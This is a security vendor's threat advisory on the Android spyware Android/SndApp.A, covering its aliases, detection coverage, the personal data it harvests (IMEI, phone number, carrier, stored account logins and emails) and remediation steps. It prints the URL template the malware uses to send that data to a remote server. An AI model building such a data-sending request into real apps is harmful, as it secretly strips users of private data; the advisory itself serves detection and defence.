This application requires Javascript for optimal performance.

Android/SndApp.A!tr.spy - Released Sep 22, 2011 - Last Updated Sep 26, 2011

Alias/es

Spyware:Android/SndApps.A (F-Secure), Android.Snadapps (Symantec)

Detection Availability

Active DatabaseExtended Database
FortiGate
low
high
FortiClient
FortiMail N/A

Visible Symptoms

Detailed Analysis

Android/SndApp.A!tr.spy targets Android mobile phones. It sends to a remote web server several personal information including the email addresses of the victim.

The application displays a splash screen such as Figure 1.

Figure 1. Splash screen for Android/SndApp.A!tr.spy

If you press the icon on the top right corner, a list of affiliate apps are shown (see Figure 2). Those applications come from the same developer and show the same information-leaking behaviour.

Figure 2. Affiliate applications
Those applications have been removed from the Android Market.



Technical Details


When the malware is launched, it collects:
  • phone's IMEI
  • phone number
  • network country iso (e.g "fr")
  • operator's name
  • accounts memorized on the mobile phone. This corresponds to all web accounts an end-user has his/her phone memorize so that he/she does not need to enter his/her credentials at each login. For instance, this can be Google accounts, Facebook accounts, e-Commerce accounts etc.
  • emails: emails of the victim. Actually, those emails are collected from the login names specified in the accounts above. When a login name looks like an e-mail (e.g it has an @ inside), the malware assumes it is an email, and collects it.
This information is sent to a remote web site: 
http://[REMOVED].com/android-notifier/notifier.php?
   appId=1&deviceId=IMEI&mobile=PHONENUMBER&country=ISOCOUNTRY
   &carrier=OPERATORNAME&email=EMAILS
When pressing the icon for affiliate applications, the malware issues several requests to: 
http://[REMOVED]ck66.com/mt/w264y234e4z2y2/&subid1=inapp
which redirect to the related applications.

Recommended Action

    FortiGate Systems

  • Check the main screen using the web interface for your FortiGate unit to ensure that the latest AV/NIDS database has been downloaded and installed on your system - if required, enable the "Allow Push Update" option.

    FortiClient Systems

  • Quarantine/delete files that are detected and replace infected files with clean backup copies.

Reference: ID - 3148366